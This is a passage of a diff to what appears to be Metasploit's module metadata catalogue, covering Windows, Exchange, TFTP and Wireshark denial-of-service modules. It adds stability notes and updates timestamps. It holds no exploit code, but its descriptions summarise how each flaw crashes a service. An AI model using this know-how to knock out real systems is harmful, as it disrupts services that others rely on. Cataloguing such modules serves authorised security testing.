"auxiliary_dos/windows/llmnr/ms11_030_dnsapi": {
"name": "Microsoft Windows DNSAPI.dll LLMNR Buffer Underrun DoS",
"fullname": "auxiliary/dos/windows/llmnr/ms11_030_dnsapi",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2011-04-12",
"type": "auxiliary",
@@ -17727,14 +17542,10 @@
"platform": "",
"arch": "",
"rport": 5355,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2024-01-07 15:02:53 +0000",
+ "mod_time": "2025-05-13 23:28:13 +0000",
"path": "/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb",
"is_install_path": true,
"ref_name": "dos/windows/llmnr/ms11_030_dnsapi",
@@ -17742,26 +17553,27 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/windows/nat/nat_helper": {
"name": "Microsoft Windows NAT Helper Denial of Service",
"fullname": "auxiliary/dos/windows/nat/nat_helper",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2006-10-26",
"type": "auxiliary",
"author": [
"MC "
],
- "description": "This module exploits a denial of service vulnerability\n within the Internet Connection Sharing service in\n Windows XP.",
+ "description": "This module exploits a denial of service vulnerability\n within the Internet Connection Sharing service in\n Windows XP.",
"references": [
"OSVDB-30096",
"BID-20804",
@@ -17770,14 +17582,10 @@
"platform": "",
"arch": "",
"rport": 53,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-13 23:28:13 +0000",
"path": "/modules/auxiliary/dos/windows/nat/nat_helper.rb",
"is_install_path": true,
"ref_name": "dos/windows/nat/nat_helper",
@@ -17785,19 +17593,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/windows/rdp/ms12_020_maxchannelids": {
"name": "MS12-020 Microsoft Remote Desktop Use-After-Free DoS",
"fullname": "auxiliary/dos/windows/rdp/ms12_020_maxchannelids",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2012-03-16",
"type": "auxiliary",
@@ -17808,13 +17617,13 @@
"jduck ",
"#ms12-020"
],
- "description": "This module exploits the MS12-020 RDP vulnerability originally discovered and\n reported by Luigi Auriemma. The flaw can be found in the way the T.125\n ConnectMCSPDU packet is handled in the maxChannelIDs field, which will result\n an invalid pointer being used, therefore causing a denial-of-service condition.",
+ "description": "This module exploits the MS12-020 RDP vulnerability originally discovered and\n reported by Luigi Auriemma. The flaw can be found in the way the T.125\n ConnectMCSPDU packet is handled in the maxChannelIDs field, which will result\n an invalid pointer being used, therefore causing a denial-of-service condition.",
"references": [
"CVE-2012-0002",
"MSB-MS12-020",
"URL-http://www.privatepaste.com/ffe875e04a",
- "URL-http://pastie.org/private/4egcqt9nucxnsiksudy5dw",
- "URL-http://pastie.org/private/feg8du0e9kfagng4rrg",
+ "URL-http://web.archive.org/web/20161020044803/http://pastie.org/private/4egcqt9nucxnsiksudy5dw",
+ "URL-http://web.archive.org/web/20160627131634/http://pastie.org/private/feg8du0e9kfagng4rrg",
"URL-http://stratsec.blogspot.com.au/2012/03/ms12-020-vulnerability-for-breakfast.html",
"EDB-18606",
"URL-https://www.rapid7.com/blog/post/2012/03/21/metasploit-update/"
@@ -17822,14 +17631,10 @@
"platform": "",
"arch": "",
"rport": 3389,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-05-13 23:28:13 +0000",
"path": "/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb",
"is_install_path": true,
"ref_name": "dos/windows/rdp/ms12_020_maxchannelids",
@@ -17837,26 +17642,27 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/windows/smb/ms05_047_pnp": {
"name": "Microsoft Plug and Play Service Registry Overflow",
"fullname": "auxiliary/dos/windows/smb/ms05_047_pnp",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm "
],
- "description": "This module triggers a stack buffer overflow in the Windows Plug\n and Play service. This vulnerability can be exploited on\n Windows 2000 without a valid user account. Since the PnP\n service runs inside the service.exe process, this module\n will result in a forced reboot on Windows 2000. Obtaining\n code execution is possible if user-controlled memory can\n be placed at 0x00000030, 0x0030005C, or 0x005C005C.",
+ "description": "This module triggers a stack buffer overflow in the Windows Plug\n and Play service. This vulnerability can be exploited on\n Windows 2000 without a valid user account. Since the PnP\n service runs inside the service.exe process, this module\n will result in a forced reboot on Windows 2000. Obtaining\n code execution is possible if user-controlled memory can\n be placed at 0x00000030, 0x0030005C, or 0x005C005C.",
"references": [
"CVE-2005-2120",
"MSB-MS05-047",
@@ -17875,7 +17681,7 @@
"microsoft-ds"
],
"targets": null,
- "mod_time": "2017-07-24 06:26:21 +0000",
+ "mod_time": "2025-05-13 23:28:13 +0000",
"path": "/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb",
"is_install_path": true,
"ref_name": "dos/windows/smb/ms05_047_pnp",
@@ -17883,26 +17689,27 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-os-restarts"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/windows/smb/ms06_035_mailslot": {
"name": "Microsoft SRV.SYS Mailslot Write Corruption",
"fullname": "auxiliary/dos/windows/smb/ms06_035_mailslot",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2006-07-11",
"type": "auxiliary",
"author": [
"hdm "
],
- "description": "This module triggers a kernel pool corruption bug in SRV.SYS. Each\n call to the mailslot write function results in a two byte return value\n being written into the response packet. The code which creates this packet\n fails to consider these two bytes in the allocation routine, resulting in\n a slow corruption of the kernel memory pool. These two bytes are almost\n always set to \"\\xff\\xff\" (a short integer with value of -1).",
+ "description": "This module triggers a kernel pool corruption bug in SRV.SYS. Each\n call to the mailslot write function results in a two byte return value\n being written into the response packet. The code which creates this packet\n fails to consider these two bytes in the allocation routine, resulting in\n a slow corruption of the kernel memory pool. These two bytes are almost\n always set to \"\\xff\\xff\" (a short integer with value of -1).",
"references": [
"BID-19215",
"OSVDB-27644",
@@ -17922,7 +17729,7 @@
"microsoft-ds"
],
"targets": null,
- "mod_time": "2024-01-07 15:02:53 +0000",
+ "mod_time": "2025-05-13 23:28:13 +0000",
"path": "/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb",
"is_install_path": true,
"ref_name": "dos/windows/smb/ms06_035_mailslot",
@@ -17930,6 +17737,11 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -17943,16 +17755,14 @@
"auxiliary_dos/windows/smb/ms06_063_trans": {
"name": "Microsoft SRV.SYS Pipe Transaction No Null",
"fullname": "auxiliary/dos/windows/smb/ms06_063_trans",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm "
],
- "description": "This module exploits a NULL pointer dereference flaw in the\n SRV.SYS driver of the Windows operating system. This bug was\n independently discovered by CORE Security and ISS.",
+ "description": "This module exploits a NULL pointer dereference flaw in the\n SRV.SYS driver of the Windows operating system. This bug was\n independently discovered by CORE Security and ISS.",
"references": [
"OSVDB-27644",
"MSB-MS06-063",
@@ -17971,7 +17781,7 @@
"microsoft-ds"
],
"targets": null,
- "mod_time": "2020-05-13 16:34:47 +0000",
+ "mod_time": "2025-05-13 23:28:13 +0000",
"path": "/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb",
"is_install_path": true,
"ref_name": "dos/windows/smb/ms06_063_trans",
@@ -17979,26 +17789,27 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/windows/smb/ms09_001_write": {
"name": "Microsoft SRV.SYS WriteAndX Invalid DataOffset",
"fullname": "auxiliary/dos/windows/smb/ms09_001_write",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"j.v.vallejo "
],
- "description": "This module exploits a denial of service vulnerability in the\n SRV.SYS driver of the Windows operating system.\n\n This module has been tested successfully against Windows Vista.",
+ "description": "This module exploits a denial of service vulnerability in the\n SRV.SYS driver of the Windows operating system.\n\n This module has been tested successfully against Windows Vista.",
"references": [
"MSB-MS09-001",
"OSVDB-48153",
@@ -18017,7 +17828,7 @@
"microsoft-ds"
],
"targets": null,
- "mod_time": "2020-05-13 16:34:47 +0000",
+ "mod_time": "2025-05-13 23:28:13 +0000",
"path": "/modules/auxiliary/dos/windows/smb/ms09_001_write.rb",
"is_install_path": true,
"ref_name": "dos/windows/smb/ms09_001_write",
@@ -18025,19 +17836,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/windows/smb/ms09_050_smb2_negotiate_pidhigh": {
"name": "Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference",
"fullname": "auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -18045,7 +17857,7 @@
"Laurent Gaffie ",
"hdm "
],
- "description": "This module exploits an out of bounds function table dereference in the SMB\n request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7\n release candidates (not RTM), and Windows 2008 Server prior to R2. Windows\tVista\n without SP1 does not seem affected by this flaw.",
+ "description": "This module exploits an out of bounds function table dereference in the SMB\n request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7\n release candidates (not RTM), and Windows 2008 Server prior to R2. Windows\tVista\n without SP1 does not seem affected by this flaw.",
"references": [
"CVE-2009-3103",
"BID-36299",
@@ -18056,14 +17868,10 @@
"platform": "",
"arch": "",
"rport": 445,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-06-02 16:05:19 +0000",
"path": "/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb",
"is_install_path": true,
"ref_name": "dos/windows/smb/ms09_050_smb2_negotiate_pidhigh",
@@ -18071,26 +17879,30 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "AKA": [
+ "EDUCATEDSCHOLAR"
+ ],
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/windows/smb/ms09_050_smb2_session_logoff": {
"name": "Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference",
"fullname": "auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"sf "
],
- "description": "This module triggers a NULL pointer dereference in the SRV2.SYS kernel driver when processing\n an SMB2 logoff request before a session has been correctly negotiated, resulting in a BSOD.\n Effecting Vista SP1/SP2 (And possibly Server 2008 SP1/SP2), the flaw was resolved with MS09-050.",
+ "description": "This module triggers a NULL pointer dereference in the SRV2.SYS kernel driver when processing\n an SMB2 logoff request before a session has been correctly negotiated, resulting in a BSOD.\n Affecting Vista SP1/SP2 (and possibly Server 2008 SP1/SP2), the flaw was resolved with MS09-050.",
"references": [
"CVE-2009-3103",
"OSVDB-57799",
@@ -18099,14 +17911,10 @@
"platform": "",
"arch": "",
"rport": 445,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2017-07-24 06:26:21 +0000",
+ "mod_time": "2025-06-02 16:04:51 +0000",
"path": "/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb",
"is_install_path": true,
"ref_name": "dos/windows/smb/ms09_050_smb2_session_logoff",
@@ -18114,19 +17922,23 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "AKA": [
+ "EDUCATEDSCHOLAR"
+ ],
+ "Stability": [
+ "crash-os-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/windows/smb/ms10_006_negotiate_response_loop": {
"name": "Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop",
"fullname": "auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -18134,7 +17946,7 @@
"Laurent Gaffie ",
"hdm "
],
- "description": "This module exploits a denial of service flaw in the Microsoft\n Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger\n this bug, run this module as a service and forces a vulnerable client\n to access the IP of this system as an SMB server. This can be accomplished\n by embedding a UNC path (\\HOST\\share\\something) into a web page if the\n target is using Internet Explorer, or a Word document otherwise.",
+ "description": "This module exploits a denial of service flaw in the Microsoft\n Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger\n this bug, run this module as a service and forces a vulnerable client\n to access the IP of this system as an SMB server. This can be accomplished\n by embedding a UNC path (\\HOST\\share\\something) into a web page if the\n target is using Internet Explorer, or a Word document otherwise.",
"references": [
"CVE-2010-0017",
"OSVDB-62244",
@@ -18144,14 +17956,10 @@
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2017-08-24 21:38:44 +0000",
+ "mod_time": "2025-05-13 23:28:13 +0000",
"path": "/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb",
"is_install_path": true,
"ref_name": "dos/windows/smb/ms10_006_negotiate_response_loop",
@@ -18159,19 +17967,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/windows/smb/ms10_054_queryfs_pool_overflow": {
"name": "Microsoft Windows SRV.SYS SrvSmbQueryFsInformation Pool Overflow DoS",
"fullname": "auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -18179,7 +17988,7 @@
"Laurent Gaffie ",
"jduck "
],
- "description": "This module exploits a denial of service flaw in the Microsoft\n Windows SMB service on versions of Windows prior to the August 2010 Patch\n Tuesday. To trigger this bug, you must be able to access a share with\n at least read privileges. That generally means you will need authentication.\n However, if a system has a guest accessible share, you can trigger it\n without any authentication.",
+ "description": "This module exploits a denial of service flaw in the Microsoft\n Windows SMB service on versions of Windows prior to the August 2010 Patch\n Tuesday. To trigger this bug, you must be able to access a share with\n at least read privileges. That generally means you will need authentication.\n However, if a system has a guest accessible share, you can trigger it\n without any authentication.",
"references": [
"CVE-2010-2550",
"OSVDB-66974",
@@ -18198,7 +18007,7 @@
"microsoft-ds"
],
"targets": null,
- "mod_time": "2020-05-13 16:34:47 +0000",
+ "mod_time": "2025-05-13 23:28:13 +0000",
"path": "/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb",
"is_install_path": true,
"ref_name": "dos/windows/smb/ms10_054_queryfs_pool_overflow",
@@ -18206,19 +18015,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/windows/smb/ms11_019_electbowser": {
"name": "Microsoft Windows Browser Pool DoS",
"fullname": "auxiliary/dos/windows/smb/ms11_019_electbowser",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -18226,7 +18036,7 @@
"Cupidon-3005",
"jduck "
],
- "description": "This module exploits a denial of service flaw in the Microsoft\n Windows SMB service on versions of Windows Server 2003 that have been\n configured as a domain controller. By sending a specially crafted election\n request, an attacker can cause a pool overflow.\n\n The vulnerability appears to be due to an error handling a length value\n while calculating the amount of memory to copy to a buffer. When there are\n zero bytes left in the buffer, the length value is improperly decremented\n and an integer underflow occurs. The resulting value is used in several\n calculations and is then passed as the length value to an inline memcpy\n operation.\n\n Unfortunately, the length value appears to be fixed at -2 (0xfffffffe) and\n causes considerable damage to kernel heap memory. While theoretically possible,\n it does not appear to be trivial to turn this vulnerability into remote (or\n even local) code execution.",
+ "description": "This module exploits a denial of service flaw in the Microsoft\n Windows SMB service on versions of Windows Server 2003 that have been\n configured as a domain controller. By sending a specially crafted election\n request, an attacker can cause a pool overflow.\n\n The vulnerability appears to be due to an error handling a length value\n while calculating the amount of memory to copy to a buffer. When there are\n zero bytes left in the buffer, the length value is improperly decremented\n and an integer underflow occurs. The resulting value is used in several\n calculations and is then passed as the length value to an inline memcpy\n operation.\n\n Unfortunately, the length value appears to be fixed at -2 (0xfffffffe) and\n causes considerable damage to kernel heap memory. While theoretically possible,\n it does not appear to be trivial to turn this vulnerability into remote (or\n even local) code execution.",
"references": [
"CVE-2011-0654",
"BID-46360",
@@ -18238,14 +18048,10 @@
"platform": "",
"arch": "",
"rport": 138,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2024-01-07 15:02:53 +0000",
+ "mod_time": "2025-05-13 23:28:13 +0000",
"path": "/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb",
"is_install_path": true,
"ref_name": "dos/windows/smb/ms11_019_electbowser",
@@ -18253,26 +18059,27 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/windows/smb/rras_vls_null_deref": {
"name": "Microsoft RRAS InterfaceAdjustVLSPointers NULL Dereference",
"fullname": "auxiliary/dos/windows/smb/rras_vls_null_deref",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2006-06-14",
"type": "auxiliary",
"author": [
"hdm "
],
- "description": "This module triggers a NULL dereference in svchost.exe on\n all current versions of Windows that run the RRAS service. This\n service is only accessible without authentication on Windows XP\n SP1 (using the SRVSVC pipe).",
+ "description": "This module triggers a NULL dereference in svchost.exe on\n all current versions of Windows that run the RRAS service. This\n service is only accessible without authentication on Windows XP\n SP1 (using the SRVSVC pipe).",
"references": [
"OSVDB-64340"
],
@@ -18288,7 +18095,7 @@
"microsoft-ds"
],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-13 23:28:13 +0000",
"path": "/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb",
"is_install_path": true,
"ref_name": "dos/windows/smb/rras_vls_null_deref",
@@ -18296,6 +18103,11 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -18309,30 +18121,24 @@
"auxiliary_dos/windows/smb/vista_negotiate_stop": {
"name": "Microsoft Vista SP0 SMB Negotiate Protocol DoS",
"fullname": "auxiliary/dos/windows/smb/vista_negotiate_stop",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm "
],
- "description": "This module exploits a flaw in Windows Vista that allows a remote\n unauthenticated attacker to disable the SMB service. This vulnerability\n was silently fixed in Microsoft Vista Service Pack 1.",
+ "description": "This module exploits a flaw in Windows Vista that allows a remote\n unauthenticated attacker to disable the SMB service. This vulnerability\n was silently fixed in Microsoft Vista Service Pack 1.",
"references": [
"OSVDB-64341"
],
"platform": "",
"arch": "",
"rport": 445,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2017-07-24 06:26:21 +0000",
+ "mod_time": "2025-05-13 23:28:13 +0000",
"path": "/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb",
"is_install_path": true,
"ref_name": "dos/windows/smb/vista_negotiate_stop",
@@ -18340,26 +18146,27 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/windows/smtp/ms06_019_exchange": {
"name": "MS06-019 Exchange MODPROP Heap Overflow",
"fullname": "auxiliary/dos/windows/smtp/ms06_019_exchange",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2004-11-12",
"type": "auxiliary",
"author": [
"pusscat "
],
- "description": "This module triggers a heap overflow vulnerability in MS\n Exchange that occurs when multiple malformed MODPROP values\n occur in a VCAL request.",
+ "description": "This module triggers a heap overflow vulnerability in MS\n Exchange that occurs when multiple malformed MODPROP values\n occur in a VCAL request.",
"references": [
"BID-17908",
"CVE-2006-0027",
@@ -18381,7 +18188,7 @@
"smtps"
],
"targets": null,
- "mod_time": "2024-01-07 15:02:53 +0000",
+ "mod_time": "2025-05-13 23:28:13 +0000",
"path": "/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb",
"is_install_path": true,
"ref_name": "dos/windows/smtp/ms06_019_exchange",
@@ -18389,26 +18196,27 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/windows/ssh/sysax_sshd_kexchange": {
"name": "Sysax Multi-Server 6.10 SSHD Key Exchange Denial of Service",
"fullname": "auxiliary/dos/windows/ssh/sysax_sshd_kexchange",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2013-03-17",
"type": "auxiliary",
"author": [
"Matt \"hostess\" Andreko "
],
- "description": "This module sends a specially-crafted SSH Key Exchange causing the service to\n crash.",
+ "description": "This module sends a specially-crafted SSH Key Exchange causing the service to\n crash.",
"references": [
"OSVDB-92081",
"URL-https://www.mattandreko.com/2013/04/sysax-multi-server-610-ssh-dos.html"
@@ -18416,14 +18224,10 @@
"platform": "",
"arch": "",
"rport": 22,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-05-13 23:28:13 +0000",
"path": "/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb",
"is_install_path": true,
"ref_name": "dos/windows/ssh/sysax_sshd_kexchange",
@@ -18431,26 +18235,27 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/windows/tftp/pt360_write": {
"name": "PacketTrap TFTP Server 2.2.5459.0 DoS",
"fullname": "auxiliary/dos/windows/tftp/pt360_write",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2008-10-29",
"type": "auxiliary",
"author": [
"kris katterjohn "
],
- "description": "The PacketTrap TFTP server version 2.2.5459.0 can be\n brought down by sending a special write request.",
+ "description": "The PacketTrap TFTP server version 2.2.5459.0 can be\n brought down by sending a special write request.",
"references": [
"CVE-2008-1311",
"OSVDB-42932",
@@ -18459,14 +18264,10 @@
"platform": "",
"arch": "",
"rport": 69,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-13 23:28:13 +0000",
"path": "/modules/auxiliary/dos/windows/tftp/pt360_write.rb",
"is_install_path": true,
"ref_name": "dos/windows/tftp/pt360_write",
@@ -18474,26 +18275,27 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/windows/tftp/solarwinds": {
"name": "SolarWinds TFTP Server 10.4.0.10 Denial of Service",
"fullname": "auxiliary/dos/windows/tftp/solarwinds",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2010-05-21",
"type": "auxiliary",
"author": [
"Nullthreat"
],
- "description": "The SolarWinds TFTP server can be shut down by sending a 'netascii' read\n request with a specially crafted file name.",
+ "description": "The SolarWinds TFTP server can be shut down by sending a 'netascii' read\n request with a specially crafted file name.",
"references": [
"CVE-2010-2115",
"OSVDB-64845",
@@ -18502,14 +18304,10 @@
"platform": "",
"arch": "",
"rport": 69,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-13 23:28:13 +0000",
"path": "/modules/auxiliary/dos/windows/tftp/solarwinds.rb",
"is_install_path": true,
"ref_name": "dos/windows/tftp/solarwinds",
@@ -18517,19 +18315,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/wireshark/capwap": {
"name": "Wireshark CAPWAP Dissector DoS",
"fullname": "auxiliary/dos/wireshark/capwap",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2014-04-28",
"type": "auxiliary",
@@ -18537,7 +18336,7 @@
"Laurent Butti",
"j0sm1"
],
- "description": "This module injects a malformed UDP packet to crash Wireshark and TShark 1.8.0 to 1.8.7, as well\n as 1.6.0 to 1.6.15. The vulnerability exists in the CAPWAP dissector which fails to handle a\n packet correctly when an incorrect length is given.",
+ "description": "This module injects a malformed UDP packet to crash Wireshark and TShark 1.8.0 to 1.8.7, as well\n as 1.6.0 to 1.6.15. The vulnerability exists in the CAPWAP dissector which fails to handle a\n packet correctly when an incorrect length is given.",
"references": [
"CVE-2013-4074",
"OSVDB-94091",
@@ -18546,14 +18345,10 @@
"platform": "",
"arch": "",
"rport": 5247,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/wireshark/capwap.rb",
"is_install_path": true,
"ref_name": "dos/wireshark/capwap",
@@ -18561,26 +18356,27 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/wireshark/chunked": {
"name": "Wireshark chunked_encoding_dissector Function DOS",
"fullname": "auxiliary/dos/wireshark/chunked",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2007-02-22",
"type": "auxiliary",
"author": [
"Matteo Cantoni "
],
- "description": "Wireshark crash when dissecting an HTTP chunked response.\n Versions affected: 0.99.5 (Bug 1394)",
+ "description": "Wireshark crash when dissecting an HTTP chunked response.\n Versions affected: 0.99.5 (Bug 1394)",
"references": [
"CVE-2007-3389",
"OSVDB-37643",
@@ -18589,14 +18385,10 @@
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
